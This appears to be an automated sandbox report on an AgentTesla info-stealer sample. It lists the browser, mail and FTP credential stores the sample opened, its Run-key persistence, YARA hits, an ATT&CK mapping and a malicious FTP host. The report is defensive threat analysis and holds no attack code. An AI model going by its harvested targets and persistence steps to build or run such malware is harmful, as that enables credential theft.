Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\dhPWt112uC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhPWt112uC.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 5324, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhPWt112uC.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 5324, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	112 Process Injection	3 Obfuscated Files or Information	11 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Software Packing	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	211 Security Software Discovery	Distributed Component Object Model	11 Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
dhPWt112uC.exe	75%	Virustotal		Browse
dhPWt112uC.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
dhPWt112uC.exe	100%	Avira	HEUR/AGEN.1309499
dhPWt112uC.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\newapp\newapp.exe	100%	Avira	HEUR/AGEN.1309499
C:\Users\user\AppData\Roaming\newapp\newapp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\newapp\newapp.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Source	Detection	Scanner	Label	Link
http://ftp.ercolina-usa.com	0%	Avira URL Cloud	safe
http://ercolina-usa.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ercolina-usa.com	192.254.225.136	true	true	unknown
api.ipify.org	104.26.13.205	true	false	high
ftp.ercolina-usa.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ftp.ercolina-usa.com	dhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ercolina-usa.com	dhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org	dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dhPWt112uC.exe, 00000000.00000002.1778647173.0000000002793000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1948576547.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2021441042.0000000003266000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.254.225.136	ercolina-usa.com	United States		46606	UNIFIEDLAYER-AS-1US	true
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589023
Start date and time:	2025-01-11 08:32:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dhPWt112uC.exe renamed because original name is a hash value
Original Sample Name:	97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/9@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 297 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:33:56	API Interceptor	8379046x Sleep call for process: dhPWt112uC.exe modified
02:33:57	API Interceptor	18x Sleep call for process: powershell.exe modified
02:34:13	API Interceptor	6343123x Sleep call for process: newapp.exe modified
07:33:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
07:34:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.254.225.136	iNFGd6bDZX.exe	Get hash	malicious	AgentTesla	Browse
	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse
	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse
	RFQ-004282A.Teknolojileri A.S.exe	Get hash	malicious	AgentTesla	Browse
	QUOTATION#08670.exe	Get hash	malicious	AgentTesla	Browse
	SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse
	TECHNICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse
	uLFOeGZaJS.exe	Get hash	malicious	AgentTesla	Browse
	RICHIESTA D'OFFERTA.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse
104.26.13.205	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	JuIZye2xKX.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ZeAX5i7cGB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	jKqPSehspS.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	A6AHI7Uk18.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Wru9ycO2MJ.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	iNFGd6bDZX.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	MyzWeEOlqb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ukBQ4ch2nE.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z6tNjJC614.exe	Get hash	malicious	FormBook	Browse	104.21.42.77
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
UNIFIEDLAYER-AS-1US	JuIZye2xKX.exe	Get hash	malicious	AgentTesla	Browse	192.254.186.165
	4LbgdNQgna.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	toIuQILmr1.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	LfZAz7DQzo.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	zdmZjYqz44.exe	Get hash	malicious	AgentTesla	Browse	108.179.234.136
	ZeAX5i7cGB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	iNFGd6bDZX.exe	Get hash	malicious	AgentTesla	Browse	192.254.225.136
	RHOqJ5BrHW.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	192.254.186.165
	28uMwHvbTD.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.205
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	104.26.13.205
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.205
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.205
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	JuIZye2xKX.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

Process:	C:\Users\user\Desktop\dhPWt112uC.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
